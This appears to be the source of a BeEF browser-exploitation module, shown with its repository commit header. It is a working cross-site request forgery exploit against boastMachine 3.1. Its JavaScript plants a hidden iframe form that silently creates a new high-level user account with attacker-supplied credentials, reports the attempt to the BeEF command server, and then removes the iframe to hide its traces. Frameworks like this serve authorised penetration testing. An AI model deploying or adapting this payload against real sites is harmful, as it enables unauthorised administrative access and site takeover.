1bf9061c1a
o ./modules/exploits/boastmachine_3_1_add_user_csrf/ o ./modules/exploits/axous_1_1_1_add_user_csrf/ Updated a few exploit titles
42 lines
1.5 KiB
JavaScript
42 lines
1.5 KiB
JavaScript
//
|
|
// Copyright 2012 Wade Alcorn wade@bindshell.net
|
|
//
|
|
// Licensed under the Apache License, Version 2.0 (the "License");
|
|
// you may not use this file except in compliance with the License.
|
|
// You may obtain a copy of the License at
|
|
//
|
|
// http://www.apache.org/licenses/LICENSE-2.0
|
|
//
|
|
// Unless required by applicable law or agreed to in writing, software
|
|
// distributed under the License is distributed on an "AS IS" BASIS,
|
|
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
|
// See the License for the specific language governing permissions and
|
|
// limitations under the License.
|
|
//
|
|
beef.execute(function() {
|
|
var base = '<%= @base %>';
|
|
var username = '<%= @username %>';
|
|
var password = '<%= @password %>';
|
|
var email = '<%= @email %>';
|
|
|
|
var boastmachine_iframe = beef.dom.createIframeXsrfForm(base, "POST", [
|
|
{'type':'hidden', 'name':'action', 'value':'add_user'},
|
|
{'type':'hidden', 'name':'do', 'value':'add'},
|
|
{'type':'hidden', 'name':'user_login', 'value':username},
|
|
{'type':'hidden', 'name':'user_pass', 'value':password},
|
|
{'type':'hidden', 'name':'user_name', 'value':username},
|
|
{'type':'hidden', 'name':'user_email', 'value':email},
|
|
{'type':'hidden', 'name':'blogs[]', 'value':'4'},
|
|
{'type':'hidden', 'name':'user_level', 'value':'4'},
|
|
]);
|
|
|
|
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
|
|
|
|
cleanup = function() {
|
|
document.body.removeChild(boastmachine_iframe);
|
|
}
|
|
setTimeout("cleanup()", 15000);
|
|
|
|
});
|
|
|